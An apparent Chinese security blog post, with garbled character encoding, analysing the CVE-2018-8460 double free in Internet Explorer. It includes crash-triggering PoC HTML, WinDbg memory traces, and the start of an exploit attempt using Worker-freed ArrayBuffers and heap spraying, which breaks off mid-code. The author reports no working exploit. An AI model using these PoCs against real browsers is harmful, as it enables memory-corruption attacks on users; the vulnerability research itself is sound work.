I"$‹<h1 id="å‰è¨€">å‰è¨€</h1>

<p>åˆ†æè¯¥æ¼æ´çš„åŸå› æ˜¯çœ‹åˆ°ZDIçš„è¿™ç¯‡åˆ†ææ–‡ç« ï¼š<a href="https://www.thezdi.com/blog/2018/10/18/cve-2018-8460-exposing-a-double-free-in-internet-explorer-for-code-execution">CVE-2018-8460: EXPOSING A DOUBLE FREE IN INTERNET EXPLORER FOR CODE EXECUTION</a>ã€‚é‡Œé¢è¯¦ç»†åˆ†æäº†è¯¥æ¼æ´çš„åŸç†å’Œåˆ©ç”¨æ€è·¯ï¼Œä½†æ˜¯æ²¡æœ‰EXPï¼Œå› æ­¤æƒ³å°è¯•è‡ªå·±å†™å‡ºEXPã€‚è™½ç„¶æœ€ç»ˆæ²¡æœ‰æˆåŠŸå†™å‡ºEXPï¼Œä½†è¿˜æ˜¯æŠŠå­¦ä¹ çš„è¿‡ç¨‹è®°å½•äº†ä¸‹æ¥ï¼Œä½œä¸ºä¸€ä¸ªç§¯ç´¯ã€‚<!--more--></p>

<h1 id="æ¼æ´æˆå› ">æ¼æ´æˆå› </h1>

<p>pocå¦‚ä¸‹ï¼š</p>

<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt">&lt;html&gt;</span>
<span class="nt">&lt;head&gt;</span>
        <span class="nt">&lt;meta</span> <span class="na">http-equiv=</span><span class="s">"Expires"</span> <span class="na">content=</span><span class="s">"-1"</span><span class="nt">&gt;</span>
<span class="nt">&lt;head&gt;</span>
<span class="nt">&lt;script&gt;</span>
	
<span class="kd">var</span> <span class="nx">iterationCount</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
	
<span class="kd">function</span> <span class="nx">testcase</span><span class="p">()</span> <span class="p">{</span>
<span class="nx">elm</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">createElement</span><span class="p">(</span><span class="dl">'</span><span class="s1">ins</span><span class="dl">'</span><span class="p">)</span>
<span class="nx">func</span> <span class="o">=</span> <span class="kd">function</span><span class="p">(</span><span class="nx">e</span><span class="p">)</span> <span class="p">{</span>
        <span class="nx">iterationCount</span><span class="o">++</span><span class="p">;</span>
        <span class="k">switch</span> <span class="p">(</span><span class="nx">iterationCount</span><span class="p">)</span> <span class="p">{</span>
                <span class="k">case</span> <span class="mi">1</span><span class="p">:</span>
                <span class="k">case</span> <span class="mi">2</span><span class="p">:</span>
                <span class="k">case</span> <span class="mi">12</span><span class="p">:</span>
                <span class="k">case</span> <span class="mi">22</span><span class="p">:</span>
                <span class="cm">/*case 34:*/</span>
                        <span class="k">this</span><span class="p">.</span><span class="nx">style</span><span class="p">.</span><span class="nx">cssText</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">-ms-layout-grid: char strict auto auto; -ms-layout-grid: none fixed 49cp auto;</span><span class="dl">'</span><span class="p">;</span>
                        <span class="k">break</span><span class="p">;</span>
        <span class="p">}</span>
<span class="p">}</span>
<span class="nx">elm</span><span class="p">.</span><span class="nx">addEventListener</span><span class="p">(</span><span class="dl">'</span><span class="s1">DOMAttrModified</span><span class="dl">'</span><span class="p">,</span> <span class="nx">func</span><span class="p">,</span> <span class="kc">true</span><span class="p">)</span>
<span class="nx">elm</span><span class="p">.</span><span class="nx">className</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">AAAAAAAAA</span><span class="dl">'</span>

<span class="nx">location</span><span class="p">.</span><span class="nx">reload</span><span class="p">();</span>

<span class="p">}</span>
<span class="nt">&lt;/script&gt;</span>

<span class="nt">&lt;body</span> <span class="na">onload=</span><span class="s">'testcase();'</span><span class="nt">&gt;</span>
<span class="nt">&lt;/html&gt;</span>
</code></pre></div></div>

<p>ä¸‹æ–­<code class="language-plaintext highlighter-rouge">MSHTML!CWritableCSSStyleDeclaration::put_cssText</code>ï¼ŒæŸ¥çœ‹æ·»åŠ cssTextåçš„ç»“æ„ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0:007&gt; r
eax=6bd3e8b4 ebx=03056320 ecx=6bfb5de0 edx=00000000 esi=6bfb5de0 edi=0413a7e0
eip=6bfb5de0 esp=0413a7d4 ebp=0413a7f8 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
MSHTML!CWritableCSSStyleDeclaration::put_cssText:
6bfb5de0 8bff            mov     edi,edi
0:007&gt; dps poi(esp+4) L7					//è¿˜æœªæ‰§è¡Œput_cssTextï¼ŒStyleä¸­ä¸ºç©º
03cbe9c0  6bd3e8b4 MSHTML!CMSStyle::`vftable'
03cbe9c4  00000001
03cbe9c8  00000000
03cbe9cc  00000008
03cbe9d0  03c0cc00
03cbe9d4  00000000
03cbe9d8  0446aab0
0:007&gt; dd 03c0cc00 L8
03c0cc00  00000000 00000000 00000000 00000008
03c0cc10  00000000 00000000 00000000 00000000
0:007&gt; g
Breakpoint 0 hit
eax=6bd3e8b4 ebx=03056320 ecx=6bfb5de0 edx=00000000 esi=6bfb5de0 edi=04139738
eip=6bfb5de0 esp=0413972c ebp=04139750 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
MSHTML!CWritableCSSStyleDeclaration::put_cssText:
6bfb5de0 8bff            mov     edi,edi
0:007&gt; dd 03c0cc00 L8						//ç¬¬ä¸€æ¬¡æ‰§è¡Œå®Œåï¼ŒStyleä¸­å«æœ‰1ä¸ªå…ƒç´ 
03c0cc00  00000010 00000001 03cbea00 00114098
03c0cc10  00000000 00000000 00000000 00000000
0:007&gt; dd 03cbea00 L4
03cbea00  04090300 6be25b4c 00000001 0446b960
0:007&gt; g
Breakpoint 0 hit
eax=6bd3e8b4 ebx=03056320 ecx=6bfb5de0 edx=00000000 esi=6bfb5de0 edi=04139738
eip=6bfb5de0 esp=0413972c ebp=04139750 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
MSHTML!CWritableCSSStyleDeclaration::put_cssText:
6bfb5de0 8bff            mov     edi,edi
0:007&gt; dd 03c0cc00 L8						//ç¬¬äºŒæ¬¡æ‰§è¡Œå®Œåï¼ŒStyleä¸­å«æœ‰11ä¸ªå…ƒç´ 
03c0cc00  00000034 0000000b 03cb4f70 0102c878
03c0cc10  04d501e0 00000002 00000000 00000000
0:007&gt; dd 03cb4f70 Lb*4
03cb4f70  04091400 6be39068 00000001 0000000f
03cb4f80  0409140a 6be39068 00000001 0000000f
03cb4f90  04091400 6be39140 00000001 0000000f
03cb4fa0  0409140a 6be39140 00000001 0000000f
03cb4fb0  04090300 6be25b4c 00000004 005700e4
03cb4fc0  0409030a 6be25b4c 00000001 6bd8aca8
03cb4fd0  04090300 6be25c58 00000002 03020c04
03cb4fe0  0409030a 6be25c58 00000002 00000000
03cb4ff0  84081f0a 8001140b 04d5cc68 04d5cc68
03cb5000  808c1f0a 8001140b 04d5cd10 00000006
03cb5010  84081f0a 8001140b 04d5cca0 04d5ccca
0:007&gt; du 04d5cc68 							//è¾“å…¥çš„cssText
04d5cc68  "char strict auto auto"
0:007&gt; du 04d5cd10 
04d5cd10  "none fixed 49cp auto"
0:007&gt; du 04d5cca0 
04d5cca0  "char strict auto auto"
0:007&gt; g
Breakpoint 0 hit
eax=6bd3e8b4 ebx=03056320 ecx=6bfb5de0 edx=00000000 esi=6bfb5de0 edi=04139738
eip=6bfb5de0 esp=0413972c ebp=04139750 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
MSHTML!CWritableCSSStyleDeclaration::put_cssText:
6bfb5de0 8bff            mov     edi,edi
0:007&gt; dd 03c0cc00 L8						//ç¬¬ä¸‰æ¬¡æ‰§è¡Œå®Œï¼ŒStyleä¸­å«æœ‰7ä¸ªå…ƒç´ 
03c0cc00  00000024 00000007 03cbce10 00bdc648
03c0cc10  04d501e0 00000002 00000000 00000000
0:007&gt; dd 03cbce10 L7*4
03cbce10  04091400 6be39068 00000001 0000000f
03cbce20  04091400 6be39140 00000001 0000000f
03cbce30  04090300 6be25b4c 00000001 6ce7d8e4
03cbce40  04090300 6be25c58 00000003 03020c04
03cbce50  0409030a 6be25c58 00000002 00000000
03cbce60  808c1f0a 8001140b 04d5cc68 6ce7d988
03cbce70  84081f0a 8001140b 04d5cca0 04d5ccca
0:007&gt; du 04d5cc68 							//cssText
04d5cc68  "none fixed 49cp auto"
0:007&gt; du 04d5cca0 
04d5cca0  "char strict auto auto"
0:007&gt; g
Breakpoint 1 hit
eax=04139704 ebx=1f9d2224 ecx=03c0cc00 edx=04139494 esi=800113eb edi=00000000
eip=6bd64cb8 esp=041394e4 ebp=04139654 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
MSHTML!CAttrArray::Free:
6bd64cb8 8bff            mov     edi,edi
0:007&gt; g
Breakpoint 1 hit
eax=03bf8000 ebx=00000006 ecx=03c0cc00 edx=00000000 esi=04139704 edi=03c0c160
eip=6bd64cb8 esp=0413948c ebp=041394d8 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
MSHTML!CAttrArray::Free:
6bd64cb8 8bff            mov     edi,edi
0:007&gt; g
Breakpoint 1 hit
eax=00000000 ebx=03cb83e0 ecx=03cb83e0 edx=00000005 esi=03cb83e0 edi=ffffffff
eip=6bd64cb8 esp=0413c1e4 ebp=0413c1f4 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
MSHTML!CAttrArray::Free:
6bd64cb8 8bff            mov     edi,edi
0:007&gt; dd 03c0cc00 L8						//ç»è¿‡ç¬¬å››æ¬¡put_cssTextåï¼ŒStyleä¸­å«æœ‰10ä¸ªå…ƒç´ 
03c0cc00  00000034 0000000a 03cb5040 00e04748
03c0cc10  04d501e0 00000002 00000000 00000000
0:007&gt; dd 03cb5040 La*4
03cb5040  04091400 6be39068 00000002 0000000f
03cb5050  0409140a 6be39068 00000001 0000000f
03cb5060  04091400 6be39140 00000002 0000000f
03cb5070  0409140a 6be39140 00000001 0000000f
03cb5080  04090300 6be25b4c 00000001 6ce7d8e4
03cb5090  04090300 6be25c58 00000002 03020c04
03cb50a0  808c1f0a 8001140b 04d5cc68 00000006
03cb50b0  808c1f0a 8001140b 04d5cd10 6ce7d988
03cb50c0  84081f0a 8001140b 04d5cca0 04d5ccca	//ç¬¬9ä¸ªå’Œç¬¬10ä¸ªå…ƒç´ æŒ‡å‘åŒä¸€ä¸ªå­—ç¬¦ä¸²
03cb50d0  84081f0a 8001140b 04d5cca0 04d5ccca
0:007&gt; du 04d5cc68 
04d5cc68  "none fixed 49cp auto"
0:007&gt; du 04d5cd10 
04d5cd10  "none fixed 49cp auto"
0:007&gt; du 04d5cca0 
04d5cca0  "char strict auto auto"
0:007&gt; du 04d5cca0 
04d5cca0  "char strict auto auto"
</code></pre></div></div>

<p>ç»è¿‡å››æ¬¡put_cssTextåï¼ŒStyleä¸­å«æœ‰ä¸¤ä¸ªæŒ‡å‘ç›¸åŒcssTextçš„å…ƒç´ ï¼Œåœ¨åç»­æ‰§è¡Œ<code class="language-plaintext highlighter-rouge">location.reload();</code>æ—¶ï¼Œä¼šæ¸…ç†å½“å‰æ–‡æ¡£çš„æ‰€æœ‰å…ƒç´ ï¼Œæ­¤æ—¶<code class="language-plaintext highlighter-rouge">CAttrArray::Free</code>å‡†å¤‡é‡Šæ”¾çš„å°±æ˜¯elmå¯¹è±¡:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0:008&gt; g
Breakpoint 1 hit
eax=0020fd78 ebx=02f355b0 ecx=02f1db70 edx=00f22e01 esi=02f1db70 edi=02f355c0
eip=6d1d4cb8 esp=035dc0ec ebp=035dc0fc iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
MSHTML!CAttrArray::Free:
6d1d4cb8 8bff            mov     edi,edi
0:008&gt; dps poi(esp+4) L10						//å½“å‰é‡Šæ”¾çš„AttrArrayå°±æ˜¯elm
02f37b80  6d2e1e34 MSHTML!CPhraseElement::`vftable'
02f37b84  00008000
02f37b88  00000000
02f37b8c  00000011
02f37b90  02f1db70
02f37b94  00000000
02f37b98  00000000
02f37b9c  00000000
02f37ba0  0000003f
02f37ba4  02000400
02f37ba8  80020e00
02f37bac  00020044
02f37bb0  02f328a0
02f37bb4  00000000
02f37bb8  00000000
02f37bbc  00000000
0:008&gt; dd 02f1db70 L4
02f1db70  00000018 00000005 02f35560 0041faf0	//AttrArray
0:008&gt; dd 02f35560 L5*4							
02f35560  80001f00 800103e9 04274ab0 035db400	//className = 'AAAAAAAAA'
02f35570  80000d09 800103e9 02f35620 02f35620	//Attribute:class
02f35580  80000d09 800103eb 02f355c0 02f355c0	//Attribute:style
02f35590  80008005 800113f2 05b223e0 ee3dfb3f	//style.cssText
02f355a0  80001a04 800113f3 02f377c0 02f37800
0:008&gt; du 04274ab0 
04274ab0  "AAAAAAAAA"
0:008&gt; du poi(02f35620+24)
0426a13c  "class"
0:008&gt; du poi(02f355c0+24)
0426a19c  "style"
0:008&gt; dd 05b223e0 L4
05b223e0  00000034 0000000a 02f7bd40 00e04748
0:008&gt; dd 02f7bd40 La*4
02f7bd40  04091400 6d2a9068 00000002 0000000f
02f7bd50  0409140a 6d2a9068 00000001 0000000f
02f7bd60  04091400 6d2a9140 00000002 0000000f
02f7bd70  0409140a 6d2a9140 00000001 0000000f
02f7bd80  04090300 6d295b4c 00000001 6e2ed8e4
02f7bd90  04090300 6d295c58 00000002 00ef0c04
02f7bda0  808c1f0a 8001140b 04284340 00000006
02f7bdb0  808c1f0a 8001140b 04284458 6e2ed988
02f7bdc0  84081f0a 8001140b 042843e8 04284412	//é‡å¤çš„å­—ç¬¦ä¸²
02f7bdd0  84081f0a 8001140b 042843e8 04284412
</code></pre></div></div>

<p>éšå<code class="language-plaintext highlighter-rouge">CAttrArray::Free</code>å†…éƒ¨ä¼šæ‰§è¡Œmemmoveç§»åŠ¨AttrArrayï¼Œå¹¶æ‰§è¡Œ<code class="language-plaintext highlighter-rouge">ProcessHeapFree</code>é‡Šæ”¾å„ä¸ªç»“æ„ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0:008&gt; pc
eax=02f35570 ebx=02f1db70 ecx=02f35560 edx=00f22e01 esi=02f35570 edi=035dc0e8
eip=6d7fcc91 esp=035dc0bc ebp=035dc0e8 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
MSHTML!CAttrArray::Free+0x84:
6d7fcc91 ff15d4b1406e    call    dword ptr [MSHTML!_imp__memmove (6e40b1d4)] ds:002b:6e40b1d4={msvcrt!memmove (75a49e5a)}
0:008&gt; dd 02f35560 L5*4
02f35560  80001f00 800103e9 04274ab0 035db400	//className = 'AAAAAAAAA'
02f35570  80000d09 800103e9 02f35620 02f35620	//Attribute:class
02f35580  80000d09 800103eb 02f355c0 02f355c0	//Attribute:style
02f35590  80008005 800113f2 05b223e0 ee3dfb3f	//style.cssText
02f355a0  80001a04 800113f3 02f377c0 02f37800
0:008&gt; pc
eax=0000001f ebx=02f1db70 ecx=04274ab0 edx=00000000 esi=02f35570 edi=035dc0e8
eip=6d221ae4 esp=035dc0c8 ebp=035dc0e8 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
MSHTML!CAttrArray::Free+0xfd:
6d221ae4 e8ddb4f8ff      call    MSHTML!ProcessHeapFree (6d1acfc6)
0:008&gt; dd 02f35560 L5*4
02f35560  80000d09 800103e9 02f35620 02f35620	//Attribute:class
02f35570  80000d09 800103eb 02f355c0 02f355c0	//Attribute:style
02f35580  80008005 800113f2 05b223e0 ee3dfb3f	//style.cssText
02f35590  80001a04 800113f3 02f377c0 02f37800
02f355a0  80001a04 800113f3 02f377c0 02f37800
0:008&gt; dps poi(esp) La							//è¦é‡Šæ”¾Attribute:style
02f355c0  6d1877a4 MSHTML!CAttribute::`vftable'
02f355c4  00000001
02f355c8  00000000
02f355cc  00000008
02f355d0  00000000
02f355d4  00000000
02f355d8  00000000
02f355dc  00000000
02f355e0  ffffffff
02f355e4  0426a19c
</code></pre></div></div>

<p>å½“å¤–å±‚çš„elméƒ½é‡Šæ”¾å®Œæ¯•åï¼Œå¼€å§‹é‡Šæ”¾å†…éƒ¨çš„elm.style.cssTextï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0:008&gt; pc
eax=00000000 ebx=02f1db70 ecx=05b223e0 edx=00000000 esi=05b223e0 edi=035dc0e8
eip=6d221aff esp=035dc0b0 ebp=035dc0bc iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
MSHTML!CAttrArray::`scalar deleting destructor'+0xc:
6d221aff e8b431fbff      call    MSHTML!CAttrArray::Free (6d1d4cb8)
0:008&gt; dd 02f35560 L5*4								//æ­¤æ—¶å¤–éƒ¨çš„elmå…¨éƒ¨è¢«é‡Šæ”¾
02f35560  80001a04 800113f3 02f377c0 02f37800
02f35570  80001a04 800113f3 02f377c0 02f37800
02f35580  80001a04 800113f3 02f377c0 02f37800
02f35590  80001a04 800113f3 02f377c0 02f37800
02f355a0  80001a04 800113f3 02f377c0 02f37800
0:008&gt; dd 05b223e0 L4								//è¿˜æœªè¢«é‡Šæ”¾çš„elm.style.cssText
05b223e0  00000034 00000009 02f7bd40 00000008		
0:008&gt; dd 02f7bd40 La*4
02f7bd40  04091400 6d2a9068 00000002 0000000f
02f7bd50  0409140a 6d2a9068 00000001 0000000f
02f7bd60  04091400 6d2a9140 00000002 0000000f
02f7bd70  0409140a 6d2a9140 00000001 0000000f
02f7bd80  04090300 6d295b4c 00000001 6e2ed8e4
02f7bd90  04090300 6d295c58 00000002 00ef0c04
02f7bda0  808c1f0a 8001140b 04284340 00000006
02f7bdb0  808c1f0a 8001140b 04284458 6e2ed988
02f7bdc0  84081f0a 8001140b 042843e8 04284412
02f7bdd0  84081f0a 8001140b 042843e8 04284412
0:008&gt; 
eax=0000001f ebx=05b223e0 ecx=04284340 edx=00000000 esi=02f7bd50 edi=035dc0a8
eip=6d221ae4 esp=035dc088 ebp=035dc0a8 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
MSHTML!CAttrArray::Free+0xfd:
6d221ae4 e8ddb4f8ff      call    MSHTML!ProcessHeapFree (6d1acfc6)
0:008&gt; dd 02f7bd40 La*4								//æ‰§è¡Œè®¸å¤šmemmoveåï¼Œå¼€å§‹é‡Šæ”¾cssTextå†…éƒ¨çš„å­—ç¬¦ä¸²
02f7bd40  808c1f0a 8001140b 04284458 6e2ed988
02f7bd50  84081f0a 8001140b 042843e8 04284412
02f7bd60  84081f0a 8001140b 042843e8 04284412
02f7bd70  84081f0a 8001140b 042843e8 04284412
02f7bd80  84081f0a 8001140b 042843e8 04284412
02f7bd90  84081f0a 8001140b 042843e8 04284412
02f7bda0  84081f0a 8001140b 042843e8 04284412
02f7bdb0  84081f0a 8001140b 042843e8 04284412
02f7bdc0  84081f0a 8001140b 042843e8 04284412
02f7bdd0  84081f0a 8001140b 042843e8 04284412
</code></pre></div></div>

<p>æ­¤æ—¶å¯ä»¥æ¸…æ™°çš„çœ‹åˆ°ï¼Œç”±äºä¹‹å‰cssTextä¸­å­˜åœ¨ä¸¤ä¸ªæŒ‡å‘ç›¸åŒå­—ç¬¦ä¸²çš„å…ƒç´ ï¼Œå› æ­¤åœ¨é‡Šæ”¾æ—¶ä¼šå°†åŒä¸€ä¸ªå­—ç¬¦ä¸²é‡Šæ”¾ä¸¤æ¬¡ï¼Œè§¦å‘äº†æ¼æ´ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0:008&gt; t
eax=0000001f ebx=05b223e0 ecx=04284340 edx=00000000 esi=02f7bd50 edi=035dc0a8
eip=6d1acfc6 esp=035dc084 ebp=035dc0a8 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
MSHTML!ProcessHeapFree:
6d1acfc6 8bff            mov     edi,edi
0:008&gt; pc
eax=0000001f ebx=05b223e0 ecx=003f0000 edx=04284340 esi=02f7bd50 edi=035dc0a8
eip=6d1acfd1 esp=035dc080 ebp=035dc0a8 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
MSHTML!ProcessHeapFree+0xb:
6d1acfd1 e8b4558e00      call    MSHTML!MemoryProtection::HeapFree (6da9258a)
0:008&gt; du poi(esp)								//å‡†å¤‡é‡Šæ”¾ç¬¬ä¸€ä¸ªcssText
04284340  "none fixed 49cp auto"
0:008&gt; pc
eax=0000001f ebx=05b223e0 ecx=003f0000 edx=04284458 esi=02f7bd50 edi=035dc0a8
eip=6d1acfd1 esp=035dc080 ebp=035dc0a8 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
MSHTML!ProcessHeapFree+0xb:
6d1acfd1 e8b4558e00      call    MSHTML!MemoryProtection::HeapFree (6da9258a)
0:008&gt; du 04284340								//ç¬¬ä¸€ä¸ªcssTextè¢«é‡Šæ”¾
04284340  "Ã†one fixed 49cp auto"
0:008&gt; du poi(esp) 								//å‡†å¤‡é‡Šæ”¾ç¬¬äºŒä¸ªcssText
04284458  "none fixed 49cp auto"
0:008&gt; pc
eax=0000001f ebx=05b223e0 ecx=003f0000 edx=042843e8 esi=02f7bd50 edi=035dc0a8
eip=6d1acfd1 esp=035dc080 ebp=035dc0a8 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
MSHTML!ProcessHeapFree+0xb:
6d1acfd1 e8b4558e00      call    MSHTML!MemoryProtection::HeapFree (6da9258a)
0:008&gt; du 04284458								//ç¬¬äºŒä¸ªcssTextè¢«é‡Šæ”¾
04284458  ".one fixed 49cp auto"				
0:008&gt; du poi(esp)								//å‡†å¤‡é‡Šæ”¾ç¬¬ä¸‰ä¸ªcssText
042843e8  "char strict auto auto"
0:008&gt; pc
eax=0000001f ebx=05b223e0 ecx=003f0000 edx=042843e8 esi=02f7bd50 edi=035dc0a8
eip=6d1acfd1 esp=035dc080 ebp=035dc0a8 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
MSHTML!ProcessHeapFree+0xb:
6d1acfd1 e8b4558e00      call    MSHTML!MemoryProtection::HeapFree (6da9258a)
0:008&gt; du 042843e8								//æ­¤æ—¶ç¬¬ä¸‰ä¸ªcssTextå·²ç»è¢«é‡Šæ”¾
042843e8  ".æºœ"
0:008&gt; du poi(esp)								//ä½†æ˜¯ç»§ç»­é‡Šæ”¾åŒä¸€ä¸ªå†…å­˜ï¼Œæ­¤æ—¶ç»§ç»­åˆ™ä¼šè§¦å‘åŒé‡é‡Šæ”¾
042843e8  ".æºœ"
</code></pre></div></div>

<h1 id="æ¼æ´åˆ©ç”¨">æ¼æ´åˆ©ç”¨</h1>

<h2 id="ç®€åŒ–poc">ç®€åŒ–POC</h2>

<p>ç»è¿‡æœ€ç»ˆç®€åŒ–åçš„POCä¸ºï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&lt;html&gt;
&lt;head&gt;
        &lt;meta http-equiv="Expires" content="-1"&gt;
&lt;head&gt;
&lt;script&gt;
	
function testcase() {
elm = document.createElement('ins')
func = function(e) {
    this.style.cssText = '-ms-layout-grid: char strict auto auto; -ms-layout-grid: none fixed 49cp auto;';
}
elm.addEventListener('DOMAttrModified', func, true)
elm.className = 'AAAAAAAAA'

}
&lt;/script&gt;

&lt;body onload='testcase();'&gt;
&lt;/html&gt;
</code></pre></div></div>

<p>ç„¶è€Œè¯¥POCçš„åˆ©ç”¨éš¾åº¦æ›´å¤§ï¼Œè™½ç„¶ä¸ç”¨reloadå³å¯é€ æˆå´©æºƒï¼Œä½†æ˜¯è°ƒè¯•åå‘ç°å´©æºƒåŸå› æ˜¯å› ä¸ºæ¯æ¬¡è®¾ç½®cssTextåéƒ½ä¼šè§¦å‘EventListenerä½¿å¾—ç»§ç»­è®¾ç½®cssTextï¼ŒåµŒå¥—è°ƒç”¨å¤šæ¬¡åå¯¼è‡´é‡Šæ”¾åŸæ¥çš„cssTextå‡ºé”™ï¼Œé€ æˆäº†å†…å­˜æŸåï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0:007&gt; r
eax=00000000 ebx=00000000 ecx=77342c0e edx=03944201 esi=00380000 edi=07d408f8
eip=7739e975 esp=03944454 ebp=039444cc iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
ntdll!RtlReportCriticalFailure+0x29:
7739e975 cc              int     3
0:007&gt; kb
 # ChildEBP RetAddr  Args to Child              
00 039444cc 7739f8a9 c0000374 773d4270 03944510 ntdll!RtlReportCriticalFailure+0x29
01 039444dc 7739f989 00000002 7d9ede58 00000000 ntdll!RtlpReportHeapFailure+0x21
02 03944510 7734d95c 00000008 00380000 07d408f8 ntdll!RtlpLogHeapFailure+0xa1
03 03944540 764914ad 00380000 00000000 07d40900 ntdll!RtlFreeHeap+0x64
04 03944554 6da925cc 00380000 00000000 07d40900 kernel32!HeapFree+0x14
05 03944570 6d1acfd6 07d40900 6d221ae9 00000000 MSHTML!MemoryProtection::HeapFree+0x46
06 03944578 6d221ae9 00000000 800113eb 1f9d2224 MSHTML!ProcessHeapFree+0x10
07 039445a0 6d425d0a 033e7680 00000000 033e7a40 MSHTML!CAttrArray::Free+0x102
08 03944714 6d607f06 6d2a4e1c 1f9d2224 07d5855c MSHTML!PROPERTYDESC::HandleStyleComponentProperty+0x8ac
09 03944778 6d607df1 07d5855c 033e7a40 039447c4 MSHTML!BASICPROPPARAMS::SetStyleComponentProperty+0xfe
0a 039447a4 6d607d82 6d2a4e1c 039447c4 000d2200 MSHTML!CBase::put_StyleComponentHelper+0x3a
0b 039447c8 6d8d2aac 033e7a40 07d5855c 6d2a4e1c MSHTML!CCSSStyleDeclaration::put_StyleComponentLocalHelper+0x7a
0c 039447e8 6d8d2a76 033e7a40 07d5855c 03944890 MSHTML!CWritableCSSStyleDeclaration::put_cssText+0x28
0d 03944810 706d302a 041f7b10 02000002 041eaa80 MSHTML!CFastDOM::CCSSStyleDeclaration::Trampoline_Set_cssText+0x7f
0e 03944880 706d3a73 041f7b10 02000002 041eaa80 jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x19d
0f 039448a8 70840b88 d6d1a38e 03944b60 041dd360 jscript9!&lt;lambda_73b9149c3f1de98aaab9368b6ff2ae9d&gt;::operator()+0xa1
10 03944920 02d90125 034d3028 041eaa80 000003b7 jscript9!Js::JavascriptOperators::PatchPutValueNoLocalFastPath&lt;Js::InlineCache&gt;+0x352
</code></pre></div></div>

<p>å†…å­˜é‡Šæ”¾çš„åŠ¨ä½œä¸å¯æ§ï¼Œæ— æ³•åœ¨é‡Šæ”¾å†…å­˜å‰æ·»åŠ å¯¹è±¡å ç”¨å†…å­˜ï¼Œå› æ­¤ä»ä½¿ç”¨åŸPOCè¿›è¡Œåˆ©ç”¨ã€‚</p>

<h2 id="åˆ©ç”¨å°è¯•">åˆ©ç”¨å°è¯•</h2>

<h3 id="å°è¯•ä¸€æ‰‹åŠ¨é‡Šæ”¾csstext">å°è¯•ä¸€ï¼šæ‰‹åŠ¨é‡Šæ”¾cssText</h3>

<p>åœ¨æŸ¥çœ‹CVE-2020-17053æ—¶ï¼Œå¯ä»¥é€šè¿‡Workerå¯¹è±¡é‡Šæ”¾ArrayBufferï¼Œéšåé€šè¿‡æ–°å»ºæ•°ç»„å¯¹è±¡å¡«å……è¢«é‡Šæ”¾çš„å†…å­˜å®ç°UAFï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>var ab = new ArrayBuffer(0x8c);
var obj = {};
obj.valueOf = function () {
    if (flag == 1) {
		//alert("free");
        worker = new Worker('worker.js');
        worker.postMessage(ab, [ab]);
        worker.terminate();
        worker = null;
        var start = Date.now();
        while (Date.now() - start &lt; 200) {}
        for(var i=0;i&lt;0x1000;++i)
		{
			R1[i] = new Array((0x1000-0x20)/4);
			for(var j=0;j&lt;R1[i].length;++j)
			{
				R1[i][j] = 0x666;   //flag
			}
		}
		// TODO: reclaim freed memory
		return 0;
    }
</code></pre></div></div>

<p>äºæ˜¯æ‰“ç®—åœ¨åˆ©ç”¨Workerå¯¹è±¡é‡Šæ”¾cssTextéšåå ç”¨ï¼Œä¿®æ”¹EXPå¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&lt;html&gt;
&lt;head&gt;
        &lt;meta http-equiv="Expires" content="-1"&gt;
&lt;head&gt;
&lt;script&gt;
	
var iterationCount = 0;
	
function testcase() {
Math.atan2(1,0);
elm = document.createElement('ins')
func = function(e) {
        iterationCount++;
        switch (iterationCount) {
                case 1:
                case 2:
                case 12:
                case 22:
